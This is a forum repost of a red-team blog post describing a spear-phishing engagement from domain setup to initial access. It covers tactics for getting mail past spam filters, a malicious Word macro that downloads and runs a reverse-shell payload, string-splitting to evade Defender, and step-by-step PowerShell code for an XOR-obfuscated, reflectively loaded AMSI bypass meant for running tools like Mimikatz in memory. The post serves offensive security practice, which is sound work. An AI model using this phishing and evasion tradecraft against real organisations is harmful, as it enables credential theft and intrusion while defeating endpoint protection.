Red Team Techniques: Gaining access on an external engagement through spear-phishing
#1
[Image: meterpreter.png]

There have been a lot of posts about crafting red team phishing campaigns, and most are incomplete. Today, we're going to walk through one of our recent external engagements from start to initial access, including domain creation, crafting phishing content, considerations for bypassing spam filters and email gateways, generating undetectable payloads, and bypassing Windows protections such as AMSI. We compiled a list of references at the bottom of this post.

Customer names and related information have been anonymized for obvious reasons. Depending on the sophistication and length of your red team engagement, you will need to gauge how much time and effort you spend on each of the items below.


Quote:Deliverability considerations:
  • Origin of mail:
    • Sending mail from localhost (e.g. your laptop) using a script.
    • IP reputation in headers.
  • Recently commissioned VPS with no sender history.
  • Sending domain reputation and domain age (amount of time between domain creation and the date of your campaign).
  • Link reputation and domain age.
  • Use a high-reputation sender, like Mailchimp or Sendgrid.
    Verify your domain with these providers so you can send emails "From:" your domain, opposed to "Delivered-by Mailchimp for XXX".
  • Match the Return-path for targeted emails.
  • Configure SPF, DKIM, and DMARC.
  • Timing & frequency:
    • If you send 100 emails at once from a low reputation IP, you'll almost certainly get flagged as spam.
  • Valid SSL certs on sending domains and links in the email.
  • Broken links.
  • Amount of HTML content.
Quote:Engagement
We generally approach phishing campaigns in three ways during an engagement:
  1. Targeted campaign against specific individuals of interest.

  2. Mass campaign against all users gleaned from the recon phase. (There are lots of great resources for recon and creating a targetable list of email addresses. Here are a few: OSINT Resources for 2019theHarvesterdatasploitawesome-osint on Github)

  3. Submission via forms on target company's website, usually by setting up a fake company.
Each campaign uses a different domain so as not to impact the reputation or deliverability of other campaigns. Campaigns should begin from most subtle to most egregious. Should the company recognize they are being targeted, your future attempts could be more heavily scrutinized. We often use Mailchimp for delivery after verifying our domain and setting up email authentication. We've also had success with a G Suite account and SMTP authentication using custom scripts.
Due to time constraints (20 hours), we chose options two and three above. For both campaigns, we used a word doc with macros.
Recon
An MX lookup of our target company showed they were using G Suite, so we could test campaigns against mock G Suite accounts to ensure we'd get through their protections.
Code:
dig target.com MX

Google does a decent job at filtering malicious attachments, so in campaign one we hosted it on a high reputation domain and in campaign two we hosted it on our own domain.
Campaign prep: generating a word doc macro and payload
For this engagement, we used a malicious word doc with macros. We leveraged unicorn (thanks @hackingdave) to generate a powershell macro to download/exec our payload, and made a slight modification to bypass Defender at the time:
Code:
"po" & "w" & "er" & "s" & "he" & "l" & "l" & ".e" & "x" & "e" & " "

We used hershell for our payload, an awesome lightweight stage 1 written in Go, whose x86 arch was undetectable at the time. If your payload is getting flagged, you have options for obfuscation and encryption, and can also manually bypass AV signatures if you know your target environment using something like dsplit. Here are some resources:
https://resources.infosecinstitute.com/antivirus-evasion-tools/
https://github.com/PowerShellMafia/PowerSploit/blob/master/AntivirusBypass/Find-AVSignature.ps1
http://obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html
Metasploit 5 was also recently released with built-in payload encryption and evasionpayloads, but we haven't had a chance to use them.

Quote:AMSI bypass

We anticipated the need to run custom powershell payloads, so we'd have to bypass a recent Windows protection called AMSI. According to Microsoft, AMSI stands for Anti-Malware Scan Interface, and allows for programs (like powershell) to submit content to a scanning engine prior to execution. Credit goes to Cyberark for their initial research into bypassing AMSI, and writeup by Andre Marques. We were able to adapt their implementations, which were getting flagged by Microsoft at the time, to bypass AMSI using XOR encryption.


Code:
1. Re-compile the AMSI Bypass DLL
2. Convert the binary to base64
   $base64string = [Convert]::ToBase64String([IO.File]::ReadAllBytes("$pwd\\bypass.dll"))
3. XOR encrypt
   foreach($byte in [Text.Encoding]::UTF8.GetBytes($base64string)) { $encrypted += $byte -bxor 1 }
4. Print encrypted buf as a byte array
   foreach($byte in $encrypted){ Write-Host -nonewline "$byte," }

On Target

1. Split encrypted buf due to powershell line limit lengths
2. Concat the buf
   $xorencrypted = $a + $b + $c + $d + $e + $f + $g
3. Decrypt the buf
   foreach($byte in $xorencrypted){$decrypted += $byte -bxor 1 }
4. Get buf as base64
   $base64string = [Text.Encoding]::UTF8.GetString($decrypted)
5. Load the DLL using reflection
   function Bypass-AMCEE { if(-not ([System.Management.Automation.PSTypeName]"Bypass.AMCEE").Type) { [Reflection.Assembly]::Load([Convert]::FromBase64String($base64string)) | Out-Null } [Bypass.AMCEE]::Subvert(); }
6. Call the bypass method
   Bypass-AMCEE

This allows us to execute powershell payloads again in memory, such as Mimikatz.

You can grab a working AMSI bypass (as of 02/13/19) here.

Read more in below blog link:
https://blog.sublimesecurity.com/red-tea...-phishing/
AMSI bypass Github link
[-] The following 2 users say Thank You to browneylad for this post:
  • darktwilight, harlan4096
Reply


Forum Jump:


Users browsing this thread: 1 Guest(s)
[-]
Welcome
You have to register before you can post on our site.

Username/Email:


Password:





[-]
Recent Posts
uBlock Origin 1.62.0
uBlock Origin 1.62...harlan4096 — 12:51
uBOLite_2024.12.30.1320
uBOLite_2024.12.30...harlan4096 — 10:37
VESA announces DisplayHDR True Black 100...
DisplayHDR True Bl...harlan4096 — 10:36
AdGuard v4.5.8 for iOS
AdGuard v4.5.8 for...harlan4096 — 09:45
Hasleo Backup Suite 5.0.1
Hasleo Backup Suit...harlan4096 — 09:44

[-]
Birthdays
Today's Birthdays
avatar (40)pieleatisDilia
avatar (42)ilyavvop
avatar (37)urytog
avatar (37)bubblewrapsuit2018
Upcoming Birthdays
avatar (49)theoldevext
avatar (44)algratCep
avatar (49)Qlaude2Sap
avatar (43)tabthinLem
avatar (38)ixofehym
avatar (50)Josepharelf
avatar (39)kholukrefar
avatar (48)Lauraimike
avatar (50)WilsonWag
avatar (48)StevenPiole
avatar (39)zetssToomy
avatar (46)GornOr
avatar (44)StephenViedy
avatar (46)tuebrUNure
avatar (39)alexeytsa4721
avatar (49)Jamesmog
avatar (37)opeqyrav
avatar (38)theatidere
avatar (47)denisEquivok
avatar (35)mikebrian01
avatar (37)ivanoFloom
avatar (41)Tyreeplurb
avatar (40)uxegihor

[-]
Online Staff
There are no staff members currently online.

>